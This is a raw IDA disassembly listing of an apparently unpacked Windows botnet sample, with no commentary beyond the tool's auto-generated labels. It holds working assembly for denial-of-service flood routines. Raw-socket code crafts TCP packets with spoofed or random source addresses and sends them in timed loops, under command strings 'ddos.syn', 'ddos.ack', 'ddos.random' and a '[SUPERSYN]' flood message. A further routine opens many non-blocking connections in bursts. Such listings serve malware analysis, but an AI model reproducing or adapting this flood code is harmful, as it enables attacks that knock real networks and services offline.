;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : EB983BC8EA998682EA0FEB9FB2D7097E
; File Name : u:\work\eb983bc8ea998682ea0feb9fb2d7097e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00116000 (1138688.)
; Section size in file : 00116000 (1138688.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
___ segment para public 'DATA' use32
assume cs:___
;org 401000h
assume es:nothing, ss:nothing, ds:___, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_40F6F1+3B20�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4013E9
push eax
lea eax, [ebp+var_494]
push offset unk_423030
push eax
call sub_4173AC
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_401090
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_40DC10
add esp, 14h
loc_401090: ; CODE XREF: sub_401000+6E�j
lea eax, [ebp+var_494]
push eax
call sub_40C4F7
push [ebp+var_290]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_401000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B2 proc near ; CODE XREF: sub_4013E9+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_441330 ; WSAStartup
test eax, eax
jz short loc_4010F2
xor eax, eax
jmp loc_4013E5
; ---------------------------------------------------------------------------
loc_4010F2: ; CODE XREF: sub_4010B2+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_44145C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4013DD
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_441398 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4013D3
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_4413B8 ; ntohs
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_4413B8 ; ntohs
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_4413B8 ; ntohs
mov [ebp+var_12], ax
call sub_417408
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4413B8 ; ntohs
push 12345678h
mov [ebp+var_14], ax
call dword_4413B4 ; ntohl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C2
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011C2: ; CODE XREF: sub_4010B2+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011DE
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011DE: ; CODE XREF: sub_4010B2+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_401216
call sub_417408
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_417408
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_401216: ; CODE XREF: sub_4010B2+10E�j
; sub_4010B2+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_4413B8 ; ntohs
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
nop
call near ptr 7C82FA46h
lea eax, [ebp+var_1C]
push eax
nop
call near ptr 7C80A427h
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_417860
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_401264: ; CODE XREF: sub_4010B2+2E2�j
; sub_4010B2+2F0�j
mov [ebp+var_4], bx
call sub_417408
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4413B8 ; ntohs
mov [ebp+var_14], ax
call sub_417408
mov edi, eax
shl edi, 10h
call sub_417408
or edi, eax
push edi
call dword_4413B8 ; ntohs
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4413B4 ; ntohl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4413B8 ; ntohs
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417490
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417490
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40B004
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417490
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417490
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_417430
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40B004
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417490
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_44141C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4013A7
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
nop
call near ptr 7C80A427h
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4013D0
jl loc_401264
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4013D0
jmp loc_401264
; ---------------------------------------------------------------------------
loc_4013A7: ; CODE XREF: sub_4010B2+2CB�j
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_423068
push eax
call sub_4173AC
lea eax, [ebp+var_F4]
push eax
call sub_40C4F7
add esp, 10h
jmp short loc_4013D3
; ---------------------------------------------------------------------------
loc_4013D0: ; CODE XREF: sub_4010B2+2E0�j
; sub_4010B2+2EE�j
mov ebx, [ebp+arg_8]
loc_4013D3: ; CODE XREF: sub_4010B2+78�j
; sub_4010B2+31C�j
push [ebp+var_20]
call dword_441450 ; closesocket
pop esi
loc_4013DD: ; CODE XREF: sub_4010B2+5B�j
call dword_441318 ; WSACleanup
mov eax, ebx
loc_4013E5: ; CODE XREF: sub_4010B2+3B�j
pop edi
pop ebx
leave
retn
sub_4010B2 endp
; =============== S U B R O U T I N E =======================================
sub_4013E9 proc near ; CODE XREF: sub_401000+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE95
push [esp+10h+arg_4]
mov esi, eax
call sub_41791F
push [esp+14h+arg_C]
mov ebx, eax
call sub_41791F
mov edi, eax
call sub_417408
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4010B2
add esp, 20h
test eax, eax
jnz short loc_401438
push 1
pop eax
loc_401438: ; CODE XREF: sub_4013E9+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401447 proc near ; DATA XREF: sub_40F6F1+3CFC�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_441438 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4014E2
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4231F4
loc_401495: ; DATA XREF: ___:off_425784�o
; ___:off_4267D4�o
push eax
call sub_4173AC
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4014C5
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40DC10
add esp, 14h
loc_4014C5: ; CODE XREF: sub_401447+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_40C4F7
push [ebp+var_38]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
loc_4014E2: ; CODE XREF: sub_401447+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_441398 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401559
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4231AC
push eax
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_40153C
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40DC10
add esp, 14h
loc_40153C: ; CODE XREF: sub_401447+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_40C4F7
push [ebp+var_38]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
loc_401559: ; CODE XREF: sub_401447+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_4413F8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4015C0
lea eax, [ebp+var_3BC]
push offset unk_42317C
push eax
call sub_4173AC
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4015A3
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40DC10
add esp, 14h
loc_4015A3: ; CODE XREF: sub_401447+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_40C4F7
push [ebp+var_38]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
loc_4015C0: ; CODE XREF: sub_401447+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call dword_4413B8 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_4413F8 ; inet_addr
mov esi, dword_421064
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_4015FE: ; CODE XREF: sub_401447+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_4017A9
push 41Ch
mov byte_43C210, 45h
call dword_4413B8 ; ntohs
cmp [ebp+var_2C], edi
mov word_43C212, ax
mov word_43C214, bx
mov word_43C216, di
mov byte_43C218, 80h
mov byte_43C219, bl
mov word_43C21A, di
jz short loc_401684
call sub_417408
mov ebx, eax
shl ebx, 8
call sub_417408
add ebx, eax
shl ebx, 8
call sub_417408
add ebx, eax
shl ebx, 8
call sub_417408
add ebx, eax
push 1
mov dword_43C21C, ebx
pop ebx
jmp short loc_40169C
; ---------------------------------------------------------------------------
loc_401684: ; CODE XREF: sub_401447+20B�j
push [ebp+var_1BC]
call sub_40AFAB
pop ecx
push eax
call dword_4413F8 ; inet_addr
mov dword_43C21C, eax
loc_40169C: ; CODE XREF: sub_401447+23B�j
mov eax, [ebp+var_18]
mov dword_43C220, eax
call sub_417408
cdq
mov ecx, 100h
idiv ecx
mov byte_43C224, dl
call sub_417408
cdq
mov ecx, 100h
idiv ecx
mov byte_43C225, dl
call sub_417408
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov word_43C226, di
mov word_43C22A, bx
inc edx
mov word_43C228, dx
call sub_417408
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_43C22C
call sub_417430
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_43C210
push [ebp+var_4]
call dword_44141C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401734
inc [ebp+arg_0]
jmp loc_4015FE
; ---------------------------------------------------------------------------
loc_401734: ; CODE XREF: sub_401447+2E3�j
push [ebp+var_4]
call dword_441450 ; closesocket
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_42311C
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41792A
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_40178C
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40DC10
add esp, 14h
loc_40178C: ; CODE XREF: sub_401447+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_40C4F7
push [ebp+var_38]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
loc_4017A9: ; CODE XREF: sub_401447+1C8�j
push [ebp+var_4]
call dword_441450 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_4230BC
push eax
call sub_4173AC
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_401811
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40DC10
add esp, 14h
loc_401811: ; CODE XREF: sub_401447+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_40C4F7
push [ebp+var_38]
call sub_417174
pop ecx
pop ecx
push edi
nop
call near ptr 7C80C058h
sub_401447 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40182E proc near ; DATA XREF: sub_40F6F1+15F0�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_40198C
push eax
lea eax, [ebp+var_414]
push offset aSupersynDoneWi ; "[SUPERSYN]: Done with flood (%iKB/sec)"
push eax
call sub_4173AC
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4018AB
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40DC10
add esp, 14h
loc_4018AB: ; CODE XREF: sub_40182E+5B�j
lea eax, [ebp+var_414]
push eax
call sub_40C4F7
push [ebp+var_10]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_40182E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018CA proc near ; CODE XREF: sub_40198C+27�p
var_654 = byte ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call dword_4413B8 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_401988
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_401915: ; CODE XREF: sub_4018CA+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_40191D: ; CODE XREF: sub_4018CA+7A�j
push 0
push 1
push 2
nop
call near ptr 71AB3B91h
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_401940
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
nop
call near ptr 71AB4519h
loc_401940: ; CODE XREF: sub_4018CA+64�j
add esi, 4
dec ebx
jnz short loc_40191D
lea esi, [ebp+var_654]
mov ebx, edi
loc_40194E: ; CODE XREF: sub_4018CA+96�j
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
nop
call near ptr 71AB406Ah
add esi, 4
dec ebx
jnz short loc_40194E
push 64h
nop
call near ptr 7C802442h
lea esi, [ebp+var_654]
mov ebx, edi
loc_401972: ; CODE XREF: sub_4018CA+B4�j
push dword ptr [esi]
nop
call near ptr 71AB9639h
add esi, 4
dec ebx
jnz short loc_401972
dec [ebp+arg_4]
jnz short loc_401915
pop edi
pop esi
pop ebx
loc_401988: ; CODE XREF: sub_4018CA+3E�j
xor eax, eax
leave
retn
sub_4018CA endp
; =============== S U B R O U T I N E =======================================
sub_40198C proc near ; CODE XREF: sub_40182E+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE95
push [esp+10h+arg_4]
mov edi, eax
call sub_41791F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41791F
mov esi, eax
push esi
push ebx
push edi
call sub_4018CA
add esp, 18h
test eax, eax
jnz short loc_4019C2
push 1
pop eax
loc_4019C2: ; CODE XREF: sub_40198C+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_40198C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019D1 proc near ; DATA XREF: sub_40F6F1+3A27�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401D1F
push eax
lea eax, [ebp+var_414]
push offset dword_423260
push eax
call sub_4173AC
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_401A4E
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40DC10
add esp, 14h
loc_401A4E: ; CODE XREF: sub_4019D1+5B�j
lea eax, [ebp+var_414]
push eax
call sub_40C4F7
push [ebp+var_10]
call sub_417174
pop ecx
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
sub_4019D1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A6D proc near ; CODE XREF: sub_401D1F+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_441330 ; WSAStartup
test eax, eax
jz short loc_401AAD
xor eax, eax
jmp loc_401D1B
; ---------------------------------------------------------------------------
loc_401AAD: ; CODE XREF: sub_401A6D+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_44145C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_401D13
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_441398 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_401D09
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call dword_4413B8 ; ntohs
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_4413B8 ; ntohs
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_4413B8 ; ntohs
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_4413B8 ; ntohs
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
nop
call near ptr 7C82FA46h
lea eax, [ebp+var_8]
push eax
nop
call near ptr 7C80A427h
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_417860
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_401B98: ; CODE XREF: sub_401A6D+25D�j
; sub_401A6D+26B�j
mov [ebp+var_24], bx
call sub_417408
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4413B8 ; ntohs
mov [ebp+var_34], ax
call sub_417408
mov edi, eax
shl edi, 10h
call sub_417408
or edi, eax
push edi
call dword_4413B8 ; ntohs
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4413B4 ; ntohl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4413B8 ; ntohs
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417490
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_417490
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40B004
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417490
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417490
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_417430
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40B004
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_417490
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_44141C ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401CDD
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
nop
call near ptr 7C80A427h
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_401D06
jl loc_401B98
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_401D06
jmp loc_401B98
; ---------------------------------------------------------------------------
loc_401CDD: ; CODE XREF: sub_401A6D+247�j
call dword_44134C ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_423298
push eax
call sub_4173AC
lea eax, [ebp+var_F4]
push eax
call sub_40C4F7
add esp, 10h
jmp short loc_401D09
; ---------------------------------------------------------------------------
loc_401D06: ; CODE XREF: sub_401A6D+25B�j
; sub_401A6D+269�j
mov ebx, [ebp+arg_8]
